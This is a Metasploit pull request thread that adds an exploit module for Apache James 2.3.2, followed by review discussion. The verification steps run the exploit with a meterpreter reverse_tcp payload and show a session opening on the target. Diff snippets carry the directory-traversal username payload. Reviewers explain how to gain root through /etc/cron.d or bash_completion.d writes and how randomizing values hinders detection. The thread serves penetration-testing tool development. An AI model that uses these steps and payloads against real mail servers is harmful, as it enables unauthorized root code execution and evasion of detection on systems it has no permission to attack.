Add Apache James 2.3.2 Arbitrary File Write Exploit Module
rapid7/metasploit-framework pull request #12862
Opened 2020-01-19 22:17 UTC by mattaberegg

## Vulnerable Application  
  This module exploits a vulnerability that exists due to a lack of input validation when creating a user in Apache James 2.3.2. By creating a user with a directory traversal payload as the username, commands can be written to a given directory. Instructions for installing the vulnerable application for testing can be found here:  
  https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf  
  
## Verification Steps  
  1. Load the module:  
```
  msf5 > use exploit/linux/smtp/apache_james_exec  
```

  2. Set remote and local options:  
```
  msf5 exploit(linux/smtp/apache_james_exec) > set target 1  
  target => 1  
  msf5 exploit(linux/smtp/apache_james_exec) > set rhosts 192.168.224.164  
  rhosts => 192.168.224.164  
  msf5 exploit(linux/smtp/apache_james_exec) > set rport 25  
  rport => 25  

  msf5 exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167  
  lhost => 192.168.224.167  
  msf5 exploit(linux/smtp/apache_james_exec) > set lport 4444  
  lport => 4444  
```

  3. Set payload:  
```
  msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp  
  payload => linux/x64/meterpreter/reverse_tcp  
```

  4. Check version and run exploit:  
```
  msf5 exploit(linux/smtp/apache_james_exec) > check  
  [*] 192.168.224.164:25 - The target appears to be vulnerable.  
  msf5 exploit(linux/smtp/apache_james_exec) > exploit  

  [*] 192.168.224.164:25 - Command Stager progress - 100.00% done (812/812 bytes)  
```

  5. Set up and run listener (Can be done before running exploit):  
```
  msf5 exploit(linux/smtp/apache_james_exec) > use exploit/multi/handler  
  msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp  
  payload => linux/x64/meterpreter/reverse_tcp  
  msf5 exploit(multi/handler) > set lport 4444  
  lport => 4444  
  msf5 exploit(multi/handler) > set lhost 192.168.224.167  
  lhost => 192.168.224.167    

  msf5 exploit(multi/handler) > run  

  [*] Started reverse TCP handler on 192.168.224.167:4444  
  [*] Sending stage (3021284 bytes) to 192.168.224.164  
  [*] Meterpreter session 1 opened (192.168.224.167:4444 -> 192.168.224.164:34752) at 2020-01-18 18:25:14 -0800  

  meterpreter >  
```

## Options  
  **USERNAME:**  The administrator username for Apache James 2.3.2 remote administration tool. By default this is 'root'.  
  **PASSWORD:**  The administrator password for Apache James 2.3.2 remote administration tool. By default this is 'root'.  
  **ADMINPORT:**  The port for Apache James 2.3.2 remote administration tool. By default this is '4555'.  
  **RHOSTS:**  The IP address of the vulnerable server.  
  **RPORT:**  The port number of the SMTP service.  

## Targets
```
  Id  Name 
  --  ----
  0   Linux x86  
  1   Linux x64  
```

## References  
  1. <https://www.exploit-db.com/exploits/35513>  
  2. <https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf>

2020-01-20 07:14 UTC, bcoles commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +  end
I believe `get` and `get_once` can return `nil` which will cause issues with `include?` (without casting `to_s`).

Also, now that you've implemented checks for both servers, it would cleaner to group them.

Suggest something like this (plus comments regarding version detection from https://github.com/rapid7/metasploit-framework/pull/12858#discussion_r368392786) :

```ruby
  def check
    # Grab banner for SMTP service
    connect
    smtp_banner = sock.get_once
    disconnect
    unless smtp_banner.to_sinclude? "(JAMES SMTP Server 2.3.2)"
      return CheckCode::Safe("Target port #{rport} is not a JAMES SMTP server")
    end

    # Grab banner for James Remote Administration tool
    connect(true, { 'RHOST'=>datastore['RHOST'], 'RPORT'=>datastore['ADMINPORT'] })
    admin_banner = sock.get_once
    disconnect

    unless admin_banner.to_s.include? "JAMES Remote Administration Tool 2.3.2"
      return CheckCode::Safe("Target port #{datastore['ADMINPORT']} is not a JAMES Remote Administration Tool server")
    end

    Exploit::CheckCode::Appears
  end
```

2020-01-20 07:14 UTC, bcoles commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +    sock.puts("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n")
Do you have control over the entirety of the file contents? Can you append to existing files, or overwrite existing files? Can you write binary data? Given that you're writing out a binary file with `cmd_stager` I'm guessing that the answer is yes.

I'm wondering if there's a better way to exploit this. It seems like you've got privileged arbitrary file write as root and you're throwing it away for low-privileged code execution using a technique that requires user interaction and could take days, weeks, months, or years to execute. I mean, if they haven't updated their server to patch a bug since 2015, then how often do users login to the system, if at all?

There's probably a few ways to exploit this, many of which won't require user interaction, but I'm not sure what would be the most reliable.

If you have complete control over the file contents, then you should be able to drop an `ARCH_CMD` payload into a cron job file easily enough, which would yield a privileged remote root shell in ~60 seconds.

Perhaps I'm overlooking something?

2020-01-21 01:19 UTC, mattaberegg commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +  end
Updated check function to check that both services are running and identify the version based on notes above.

2020-01-21 01:21 UTC, mattaberegg commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +    sock.puts("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n")
Yes, this is somewhat the reason I was stuck between what to label this module. It is not a complete arbitrary file write in the sense that I can write any file. Instead, I can control the directory where a mail object will be written, and I can partially control the data that is contained in that object (though I can't control the name, type, or full contents of the file). With these conditions, that is enough to get code execution with some user interaction through bash completion. In this case, I do not think I have enough control to successfully create a working cron job.

2020-01-21 01:31 UTC, mattaberegg commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +    sock.puts("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n")
I believe when writing a file to /etc/cron.d, if there is any text in the cron job that is not a valid command, it will not run.  For example, the following cronjob will not execute since "blah" is not a command.

```
blah
* * * * * root echo test > /tmp/test
```

In the case of the exploit, "blah" represents the various values in the mail that was sent (To, From, etc).  Since the entirety of the file can not be controlled, I'm not sure I can create a valid cron job file through this exploit.

2020-01-21 02:00 UTC, bcoles commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +    sock.puts("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n")
> 
> 
> I believe when writing a file to /etc/cron.d, if there is any text in the cron job that is not a valid command, it will not run. For example, the following cronjob will not execute since "blah" is not a command.

That's true on some modern systems, such as Ubuntu 19, presumably due to a change in cron. Traditionally, this was not the case.

2020-01-21 13:31 UTC, mattaberegg commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +    sock.puts("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n")
Ahh that makes sense, I was performing some cron job testing on a 2019 install of Ubuntu.  I'm thinking I'll take another pass at writing this module and exploit via writing the mail object to /etc/cron.d then and just target this exploit to versions of linux that allow cronjobs with invalid commands.  That will definitely make for a more robust exploit and I would think that any system running an unpatched mail server from 2015 is likely running an older version of linux as well.

2020-01-21 13:37 UTC, mattaberegg commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +    sock.puts("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n")
Also do you happen to know where I might find documentation of when/what version the changes to cron happened? Thanks again for all your helpful feedback!

2020-01-21 16:14 UTC, bcoles commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +    sock.puts("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n")
> 
> 
> Also do you happen to know where I might find documentation of when/what version the changes to cron happened? Thanks again for all your helpful feedback!

I have no idea, but I recently encountered this issue, and was able to "bypass" it on a 2018 system.

* https://github.com/bcoles/local-exploits/blob/master/CVE-2019-18862/exploit.cron.sh

2020-01-21 16:50 UTC, mattaberegg commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +    sock.puts("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n")
Awesome, I'll look into that! I'll probably be making a decent amount of changes to the exploit/documentation, should I close this PR and reopen a new one later or just leave this up?

2020-01-21 16:58 UTC, bcoles commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +    sock.puts("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n")
> 
> 
> Awesome, I'll look into that! I'll probably be making a decent amount of changes to the exploit/documentation, should I close this PR and reopen a new one later or just leave this up?

Hey. No don't do that. Leave the PR open.

I'm too tired to offer guidance in msf context right now. Maybe see what you come up with and get back to me/us. Overwriting the application environment or using `LD_PRELOAD` would be awesome, but probably out of the question due to limited control over the target file.

The short answer is probably to add a different `target` for different exploit vectors. ie, cron vs vs bashrc (?) vs bash completion.

I know I'm being picky. I just hate to see root code execution go to waste. Wasted potential makes baby Jesus cry.

2020-01-22 14:57 UTC, acammack-r7 commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +    sock.puts("adduser ../../../../../../../../etc/bash_completion.d exploit\n")
Could `exploit` here be randomized text?

2020-01-22 15:04 UTC, acammack-r7 reviewed
Love the multi-service vulnerabilities. A couple more questions about the module.

2020-01-22 15:04 UTC, acammack-r7 commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +          'DisablePayloadHandler' => 'true'
Was there a reason the user needs to run the handler manually?

2020-01-22 15:04 UTC, acammack-r7 commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +        ])
I would also add:
```
Opt::RPORT(25)
```
Since this is targeting an SMTP server.

2020-01-22 15:04 UTC, acammack-r7 commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +      'CmdStagerFlavor'=> [ 'printf' ],
Most of the time this has to be set for embedded environments that only have one or two of the methods available to them, but a full Linux install should be able to do most of them. Is there a reason you are limiting it here?

2020-01-22 15:04 UTC, acammack-r7 commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +      deregister_options('SRVHOST', 'SRVPORT')
Do we need to deregister these? They are used by other flavors of command stager that we may want consider allowing.

2020-01-23 01:13 UTC, mattaberegg commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +    sock.puts("adduser ../../../../../../../../etc/bash_completion.d exploit\n")
Yes, that is just an arbitrary value for the password.  Is there a reason that randomized text would be preferable?

2020-01-23 01:21 UTC, mattaberegg commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +          'DisablePayloadHandler' => 'true'
So the way this exploit is currently works is that the payload is written to /etc/bash_completion.d and the payload is triggered when a user opens a shell on the system.  Since there is no way of knowing when the payload might be triggered, it seemed to make more sense to have the user set up the listener outside of the exploit (thus the reason the handler was disabled here).  However, after @bcoles comments above on gaining execution through a write to /etc/cron.d, I am going to rewrite this module to hopefully gain rce through that route instead (and will re-enable the payload handler since that method won't require any user interaction to execute the payload).

2020-01-23 01:23 UTC, mattaberegg commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +        ])
I'll add that as I'm working on the rewrite!

2020-01-23 01:24 UTC, mattaberegg commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +      'CmdStagerFlavor'=> [ 'printf' ],
There wasn't really a reason, that was the one I tested with so I added it explicitly.  I'll make sure to allow all the linux options when I rewrite this.

2020-01-23 01:26 UTC, mattaberegg commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +      deregister_options('SRVHOST', 'SRVPORT')
Ahh, that's what those are for.  I only deregistered them because I couldn't figure out what they were used for.  I'll make sure to remove that when I add the use of the other command stager flavors!

2020-02-03 01:40 UTC, mattaberegg commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +    sock.puts("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n")
This module now targets both the bash completion and cron methods of exploitation.  Thanks for your advice on updating this!

2020-02-03 01:44 UTC, mattaberegg commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +          'DisablePayloadHandler' => 'true'
We now no longer disable the payload handler since it is needed for the cron method of exploitation however for the bash completion method of exploitation, the user will still need to set up their own handler for the reasons listed above (this is noted in the module description and documentation).

2020-02-03 01:44 UTC, mattaberegg commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +        ])
Added this in, thanks for the suggestion!

2020-02-03 01:45 UTC, mattaberegg commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +      'CmdStagerFlavor'=> [ 'printf' ],
Added this in, thanks for the suggestion!

2020-02-03 01:45 UTC, mattaberegg commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +      deregister_options('SRVHOST', 'SRVPORT')
Fixed this, thanks for the suggestion!

2020-02-04 15:49 UTC, ccondon-r7 commented
Hey @mattaberegg, just wanted to say this is a really comprehensive first PR! The info you included up-front is fantastic. Thank you for that, and please keep it up!

2020-02-05 02:22 UTC, mattaberegg commented
@ccondon-r7 Thanks, happy to contribute to a tool I use so much!

2020-02-05 20:54 UTC, acammack-r7 submitted a review, later dismissed
Thanks for the updates! Just a couple style things I see on a second pass. The biggest is using regular expressions to do substring match, which makes the check far more expensive than it needs to be.

2020-02-05 20:54 UTC, acammack-r7 commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +    unless smtp_banner =~ /JAMES SMTP Server/
```suggestion
    unless smtp_banner.include? 'JAMES SMTP Server'
```

2020-02-05 20:54 UTC, acammack-r7 commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +    connect(true, { 'RHOST'=>datastore['RHOST'], 'RPORT'=>datastore['ADMINPORT'] })
```suggestion
    connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => datastore['ADMINPORT']})
```

Our style guide permits the spaces around `{` and `}`, although most of our code doesn't use them except for blocks. You are free to do either way, but we do want to spaces around ` => `.

2020-02-05 20:54 UTC, acammack-r7 commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +    unless admin_banner =~ /JAMES Remote Administration Tool/
```suggestion
    unless admin_banner.include? 'JAMES Remote Administration Tool'
```

2020-02-05 20:54 UTC, acammack-r7 commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +    connect(true, { 'RHOST'=>datastore['RHOST'], 'RPORT'=>datastore['ADMINPORT'] })
```suggestion
    connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => datastore['ADMINPORT']})
```

2020-02-05 20:54 UTC, acammack-r7 commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +      connect(true, { 'RHOST'=>datastore['RHOST'], 'RPORT'=> "110" })
```suggestion
      connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => "110"})
```

2020-02-05 23:24 UTC, mattaberegg commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +    unless smtp_banner =~ /JAMES SMTP Server/
Fixed, I used the following syntax as @bcoles had pointed out that a potential nil value returned from sock.get_once could cause issues with the include.

`unless smtp_banner.to_s.include? "JAMES SMTP Server"`

2020-02-05 23:24 UTC, mattaberegg commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +    connect(true, { 'RHOST'=>datastore['RHOST'], 'RPORT'=>datastore['ADMINPORT'] })
Fixed

2020-02-05 23:25 UTC, mattaberegg commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +    unless admin_banner =~ /JAMES Remote Administration Tool/
Fixed the same as above

2020-02-05 23:25 UTC, mattaberegg commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +    connect(true, { 'RHOST'=>datastore['RHOST'], 'RPORT'=>datastore['ADMINPORT'] })
Fixed

2020-02-05 23:25 UTC, mattaberegg commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +      connect(true, { 'RHOST'=>datastore['RHOST'], 'RPORT'=> "110" })
Fixed

2020-02-07 06:17 UTC, bcoles commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +    sock.puts("adduser ../../../../../../../../etc/bash_completion.d exploit\n")
> 
> 
> Yes, that is just an arbitrary value for the password. Is there a reason that randomized text would be preferable?

Randomization hinders detection. Presuming that the length can also be randomized:

```ruby
    add_user_command = "adduser ../../../../../../../../etc/#{exploit_path} #{Rex::Text.rand_text_alpha(8..12)}\n"
```

Although if the `exploit` username is used elsewhere in the module, it should be assigned to a variable instead.

```ruby
    @username = Rex::Text.rand_text_alpha(8..12)
    add_user_command = "adduser ../../../../../../../../etc/#{exploit_path} #{@username}\n"
```

2020-02-07 06:21 UTC, bcoles commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +          'ExploitPath' => 'bash_completion.d',
`ExploitPath` isn't standard convention. That's not a problem, but the literal value also isn't used anywhere, except for determining which code path to take. Instead, you could remove `ExploitPath` and use `target.name`. ie:

```ruby
if target.name == 'Bash Completion'
# do a thing
end
if target.name == 'Cron'
# do a different thing
end
```

2020-02-07 06:22 UTC, bcoles commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +      connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => "110"})
What's `'RPORT' => "110"` in this context? Should it be user-configurable?

2020-02-07 06:24 UTC, bcoles commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +  end
It might be nice to `print_warning` warn the user about any necessary cleanup required, such as deleting the user account, if they're not using the `cron.d` method.

2020-02-07 06:25 UTC, bcoles commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +  def cron_cleanup()
```suggestion
  def cron_cleanup
```

2020-02-08 00:33 UTC, mattaberegg commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +    sock.puts("adduser ../../../../../../../../etc/bash_completion.d exploit\n")
Ahh that makes sense.  My only concern with this is that when using the bash completion method of exploitation, there may be a large period of time between sending the payload and it being triggered.  Since the shell returned is based on the user that triggers the payload, there may be a situation where the attacker gains a shell a significant amount of time after running this exploit but does not have permissions to delete files from /etc/bash_completion.d.  In that case, the only way the user could clean up the payload would be by logging onto the mail service as the malicious user and deleting the message containing the payload (which would require the password).  If the password were random, the user might forget and be left without a way to clean up the payload.  

Let me know what you think, I am more than happy to change this to a random password if that seems most appropriate.

2020-02-08 00:36 UTC, mattaberegg commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +      connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => "110"})
This is the POP3 service for Apache James.  This is used to log in as the malicious user and delete the mail objects that store the payload on cleanup.  I added it to the user configurable options and updated the documentation.

2020-02-08 00:37 UTC, bcoles commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +    sock.puts("adduser ../../../../../../../../etc/bash_completion.d exploit\n")
>  In that case, the only way the user could clean up the payload would be by logging onto the mail service as the malicious user and deleting the message containing the payload (which would require the password)

The traditional approach in these situations is to print the `@password` either in the cleanup routines or after successful exploitation. The former is preferred, as the operator would usually wish to know the password for the created account, regardless of whether exploitation was successful.

2020-02-08 00:43 UTC, mattaberegg commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +  end
Added a message detailing what needs to be removed, including the user and password created.  The password portion of the message can be changed if the password is changed to be randomly generated.

2020-02-08 00:43 UTC, mattaberegg commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +  def cron_cleanup()
Fixed

2020-02-08 00:48 UTC, mattaberegg commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +          'ExploitPath' => 'bash_completion.d',
Yes, this was my attempt to reduce having multiple target options with similar values.

2020-02-08 00:54 UTC, bcoles reviewed
I gave this a once over and it looks good to me. @h00die might have some comments about the documentation formatting. There's a new tool `./tools/dev/msftidy_docs.rb` for documentation style checks.

2020-02-08 00:54 UTC, bcoles commented on documentation/modules/exploit/linux/smtp/apache_james_exec.md
> +  **If using Cron exploitation method:** This method allows for automatic execution of the payload with no user interaction required and gives the attacker root privileges. It will also attempt to au
```suggestion
  **If using Cron exploitation method:** This method allows for automatic execution of the payload with no user interaction required and gives the attacker root privileges. It will also attempt to automatically cleanup the malicious user and the mail objects.
  
  
```

2020-02-08 00:54 UTC, bcoles commented on documentation/modules/exploit/linux/smtp/apache_james_exec.md
> +**If using Bash Completion:** This method may be preferable if targeting a linux operating system such as some versions of Ubuntu that fails to run the cron method for exploitation. This exploitation
```suggestion
**If using Bash Completion:** This method may be preferable if targeting a linux operating system such as some versions of Ubuntu that fails to run the cron method for exploitation. This exploitation method will leave an Apache James mail object artifact in the /etc/bash_completion.d directory and the malicious user account.
```

2020-02-08 00:54 UTC, bcoles commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +      return CheckCode::Detected("However,version #{version} of JAMES Remote Administration Tool may still be vulnerable")
```suggestion
      return CheckCode::Detected("Version #{version} of JAMES Remote Administration Tool may be vulnerable")
```

2020-02-08 00:54 UTC, bcoles commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +      print_bad("Failed to remove payload artifacts from /etc/cron.d")
Is this true? A failure to login to the POP3 port `110` and issue a `dele` command is more likely a failure to delete mailbox artifacts, rather than a failure to delete `/etc/cron.d` artifacts.

2020-02-08 01:21 UTC, mattaberegg commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +      print_bad("Failed to remove payload artifacts from /etc/cron.d")
In this case, the I was referring to these as the same thing.  The files stored in /etc/cron.d are mail objects, however since one mail object contains the payload I referred to them as payload artifacts.  

I can change the wording on this to make it clear if that is preferable!

2020-02-08 01:56 UTC, mattaberegg commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +    sock.puts("adduser ../../../../../../../../etc/bash_completion.d exploit\n")
The case I was thinking of is if a user successfully runs the exploit, writes a mail object, and accidentally kills or clears the Metasploit session (or the terminal, etc) without recording the password, they potentially may not have a way to delete the object whereas if it were a static password they could reference the code or rerun the exploit to see what it was.  I understand that is a small edge case which would require a user failure though, I'll change this to a random password.

2020-02-08 02:04 UTC, bcoles commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +    sock.puts("adduser ../../../../../../../../etc/bash_completion.d exploit\n")
An alternative solution is to save the credentials in the credential database, or to save the credentials in `logs`. The latter probably makes more sense, as the user account will be deleted later and probably (?) isn't useful for anything else.

Logs can be saved with `file_local_write`. Use of this function should be discouraged, but we don't have a replacement yet. The alternative is to store in `loot` with `store_loot`.

Another option is to allow the password to be user-configurable (default to random), which shifts the blame to the operator should they happen to forget the password.

2020-02-08 02:25 UTC, mattaberegg commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +    sock.puts("adduser ../../../../../../../../etc/bash_completion.d exploit\n")
I think it might just be cleanest to set it to random and leave it up to the user to ensure that they record the password if that is okay with you.  I would like to avoid creating another user option if possible as its a pretty large list already and it seems like neither of the credential storing options (log or credential database) sounds ideal for this type of credential.

2020-02-08 02:29 UTC, bcoles commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +    sock.puts("adduser ../../../../../../../../etc/bash_completion.d exploit\n")
> 
> 
> I think it might just be cleanest to set it to random and leave it up to the user to ensure that they record the password if that is okay with you. I would like to avoid creating another user option if possible as its a pretty large list already and it seems like neither of the credential storing options (log or credential database) sounds ideal for this type of credential.

You could set is as an advanced option with `register_advanced_option`. That way it won't show up in the options list unless the operator runs `show advanced`. I'm fine with leaving it as an unconfigurable random string.

2020-02-08 02:31 UTC, mattaberegg commented on documentation/modules/exploit/linux/smtp/apache_james_exec.md
> +  **If using Cron exploitation method:** This method allows for automatic execution of the payload with no user interaction required and gives the attacker root privileges. It will also attempt to au
Fixed this.  I also made some revisions to the documentation overall and checked them against msftidy_docs.rb so it shows no issues now.

2020-02-08 02:32 UTC, mattaberegg commented on documentation/modules/exploit/linux/smtp/apache_james_exec.md
> +**If using Bash Completion:** This method may be preferable if targeting a linux operating system such as some versions of Ubuntu that fails to run the cron method for exploitation. This exploitation
Fixed

2020-02-08 02:37 UTC, mattaberegg commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +      return CheckCode::Detected("However,version #{version} of JAMES Remote Administration Tool may still be vulnerable")
Fixed

2020-02-08 02:41 UTC, mattaberegg commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +    sock.puts("adduser ../../../../../../../../etc/bash_completion.d exploit\n")
Okay, I will leave this as an unconfigurable option then just to reduce complexity.

2020-02-08 03:16 UTC, mattaberegg commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +    sock.puts("adduser ../../../../../../../../etc/bash_completion.d exploit\n")
Added password randomization

2020-02-08 03:19 UTC, mattaberegg commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +      print_bad("Failed to remove payload artifacts from /etc/cron.d")
After adding the password randomization, I realized that if we hit this rescue statement we have already created the malicious object but are unable to delete for some reason.  If the attacker gains a valid shell they shouldn't have any problems deleting the mail objects from /etc/cron.d manually but I added in the username and password to this error message just in case they need to delete through the POP3 service

2020-02-19 17:39 UTC, cdelafuente-r7 requested changes
@mattaberegg, thanks for this great contribution! And for a first PR, it is awesome!
I just have some comments/suggestions before it lands.

2020-02-19 17:39 UTC, cdelafuente-r7 commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +    end
Instead of `sleep` here, you can use the built-in advanced datastore option `WfsDelay` to wait for a session after the payload has been delivered. Note that the value should be greater than 60 since it looks like Apache James takes a bit of time to put the files in `/etc/cron.d/`. 90 seconds works well in my testing environment. The cool thing with `WfsDelay` is it will immediately continue the execution as soon as the session is created. No need to wait 90 seconds if the session gets created before.

Also, whereas `cron.d` target needs to start the handler and wait a bit for `cron` to execute the payload, `bash_completion.d` target doesn't need the handler to be automatically started when `exploit` gets executed, since it will be started by the operator. The advanced datastore option `DisablePayloadHandler` can be used to prevent the handler to start.

You can set theses default option values per target in the info hash.

To do all of this, I would recommend to refactor the code this way:
1. Remove `if exploit_path == "cron.d" ...` block from `execute_command`
2. Add the `'DefaultOptions` to the target, these will be used to set the datastore each time the operator do a `set target`:
```ruby
      'Targets'        =>
      [
        [ 'Bash Completion', {
          'ExploitPath' => 'bash_completion.d',
          'ExploitPrepend' => '',
          'DefaultOptions' => { 'DisablePayloadHandler' => true, 'WfsDelay' => 0 }
        } ],
        [ 'Cron', {
          'ExploitPath' => 'cron.d',
          'ExploitPrepend' => '* * * * * root ',
          'DefaultOptions' => { 'DisablePayloadHandler' => false, 'WfsDelay' => 90 }
        } ]
      ],
```
3. You also need to add a call to `import_target_defaults` at the end of `def initialize`, after the info hash is setup. This will set the `DefaultOptions` for the default target when the module gets initialised.
4. Change `def cron_cleanup` to `def cleanup` (this will be called automatically by the Framework when the execution is done and after the session is created). You will need to add some logic to only perform a cleanup with the `cron.d` target:
```ruby
  def cleanup
    return unless target['ExploitPath'] == "cron.d"
    ...
```
5. Move all the `print_...` to the `def execute_cmdstager_end`. This callback method is called after the `cmdstager` is done with payload delivery. This is a good place to add such post execution warnings. Note that you can also add some extra information to notify the operator about what's going on and what to do next:
```ruby
  def execute_cmdstager_end(opts)
    if target['ExploitPath'] == "cron.d"
      print_status("Waiting for cron to execute payload...")
    else
      print_status("Payload will be triggered when someone login on the target")
      print_warning("You need to start your handler: 'handler -H #{datastore['LHOST']} -P #{datastore['LPORT']} -p #{datastore['PAYLOAD']}'")
      print_warning("After payload is triggered, delete the message and account of user '../../../../../../../../etc/bash_completion.d' with password '#{@account_password}' to fully clean up exploit artifacts.")
    end
  end
```
6. `execute_cmdstager` should be called with the `background: true` argument. This makes the payload run in background and prevent blocking the user when logging in the remote system (in case of `bash_completion.d` target). So, `def exploit` will be reduce to this (cleanup code will be handled by the Framework):
```ruby
  def exploit
    execute_cmdstager(background: true)
  end
```

2020-02-19 17:39 UTC, cdelafuente-r7 commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +    end
If you agree with these changes but you're not sure how to refactor all of these, I can submit a PR to your branch. Let me know.

2020-02-20 01:55 UTC, mattaberegg commented
Thanks @cdelafuente-r7 for the great suggestions, I'll get started on implementing these changes!

2020-02-20 02:00 UTC, mattaberegg commented on documentation/modules/exploit/linux/smtp/apache_james_exec.md
> +  **POP3PORT** The port for the POP3 Apache James Service.  By default this '110'.
Added blank lines between each option, msftidy_docs.rb seems to flag the spaces at the EOL as a style issue.

2020-02-20 02:01 UTC, mattaberegg commented on documentation/modules/exploit/linux/smtp/apache_james_exec.md
> +```
Added line breaks here as well

2020-02-20 03:07 UTC, mattaberegg commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +    end
Fixed these items.  Definitely way cleaner/usable now, thanks for the help on this!  Let me know if I missed anything here I can refactor as needed.

2020-02-20 09:33 UTC, cdelafuente-r7 commented on modules/exploits/linux/smtp/apache_james_exec.rb
> +    end
That's perfect! Thanks!

2020-02-20 09:35 UTC, cdelafuente-r7 approved these changes
Thanks for your contribution, I will land it today.

2020-02-20 09:43 UTC, merged

2020-02-20 09:51 UTC, cdelafuente-r7 commented
# Release Notes

This module exploits an arbitrary file write vulnerability in Apache James 2.3.2, which exists due to a lack of input validation when creating a user. By creating a user with a directory traversal payload as the username, commands can be written to specific directory/file and give remote code execution.